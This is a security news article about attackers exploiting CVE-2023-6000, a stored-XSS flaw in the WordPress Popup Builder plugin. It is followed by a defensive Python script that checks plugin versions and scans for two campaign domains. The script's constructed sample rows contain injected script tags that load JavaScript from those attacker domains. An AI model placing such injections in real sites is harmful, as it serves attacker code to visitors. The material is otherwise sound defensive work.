March 11, 2024 By Pierluigi Paganini

Threat actors are hacking WordPress sites by exploiting a vulnerability, tracked as CVE-2023-6000, in outdated versions of the Popup Builder plugin.
In January, Sucuri researchers reported that Balada Injector malware had infected over 7,100 WordPress sites running a vulnerable version of the Popup Builder WordPress plugin. Sucuri reported that on December 13th the Balada Injector campaign started infecting websites using older versions of Popup Builder (CVE-2023-6000, CVSS score 8.8). The Popup Builder WordPress plugin before 4.2.3 does not prevent unauthenticated visitors from updating existing popups and injecting raw JavaScript into them, which can lead to stored XSS attacks.
In the past three weeks, the researchers observed a spike in attacks from a new malware campaign exploiting the same flaw in Popup Builder. According to PublicWWW, threat actors have already compromised over 3,300 websites. Sucuri’s SiteCheck remote malware scanner has detected Balada Injector malware on over 1,170 sites.
These attacks originated from two domains registered on February 12th, 2024:
- ttincoming.traveltraffic[.]cc
- host.cloudsonicwave[.]com
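The two facts above that a site owner can act on are the fixed version (Popup Builder 4.2.3, per the advisory text) and the two campaign domains. The following triage script is an added example written for this page, not code from Sucuri or the Popup Builder project: it compares an installed plugin version against the 4.2.3 threshold and scans database content for the listed domains in either fanged or defanged form. The sample rows are constructed, and the field name popup_custom_js is a hypothetical label for wherever a given install stores popup JavaScript; the page does not describe the plugin's real storage layout.

```python
import re
from typing import List, Tuple

# Fixed version named in the advisory text: Popup Builder < 4.2.3 is affected.
FIXED_VERSION = (4, 2, 3)

# Domains the article lists for the campaign, copied as written (defanged with [.]).
IOC_DOMAINS_DEFANGED = [
    "ttincoming.traveltraffic[.]cc",
    "host.cloudsonicwave[.]com",
]


def refang(domain: str) -> str:
    """Turn a defanged indicator ('example[.]com') back into a plain hostname."""
    return domain.replace("[.]", ".")


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse 'MAJOR.MINOR.PATCH' into a comparable tuple; non-numeric parts count as 0."""
    parts = []
    for piece in version.strip().split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable(version: str) -> bool:
    """True when the installed Popup Builder version predates the 4.2.3 fix."""
    return parse_version(version) < FIXED_VERSION


def find_iocs(text: str) -> List[str]:
    """Return the campaign domains (refanged) found in text, matching 'a.b' or 'a[.]b' forms."""
    hits = []
    for defanged in IOC_DOMAINS_DEFANGED:
        plain = refang(defanged)
        # Escape the hostname, then let every dot also match a literal '[.]'.
        pattern = re.escape(plain).replace(r"\.", r"(?:\.|\[\.\])")
        if re.search(pattern, text, re.IGNORECASE):
            hits.append(plain)
    return hits


# Constructed sample rows imitating (field, value) pairs exported from a WordPress
# database; none of this is real data from the campaign. The script paths are made up.
SAMPLE_ROWS = [
    ("popup_custom_js", '<script src="https://ttincoming.traveltraffic.cc/x.js"></script>'),
    ("popup_custom_js", "document.addEventListener('DOMContentLoaded', function(){});"),
    ("post_content", "<p>Subscribe to our newsletter!</p>"),
    ("popup_custom_js", "var s=document.createElement('script');s.src='//host.cloudsonicwave.com/w.js';"),
]


def scan_rows(rows) -> List[Tuple[str, List[str]]]:
    """Return (field, matched_domains) for every row that references a campaign domain."""
    findings = []
    for field, value in rows:
        hits = find_iocs(value)
        if hits:
            findings.append((field, hits))
    return findings


if __name__ == "__main__":
    installed = "4.1.15"  # hypothetical version read from the plugin header
    print("vulnerable version:", is_vulnerable(installed))
    for field, domains in scan_rows(SAMPLE_ROWS):
        print(f"{field}: references {', '.join(domains)}")
```

A positive version check means the site should be updated before cleanup; a positive IOC hit means popups were already tampered with and the injected JavaScript must be removed in addition to patching, since updating the plugin does not revert stored content.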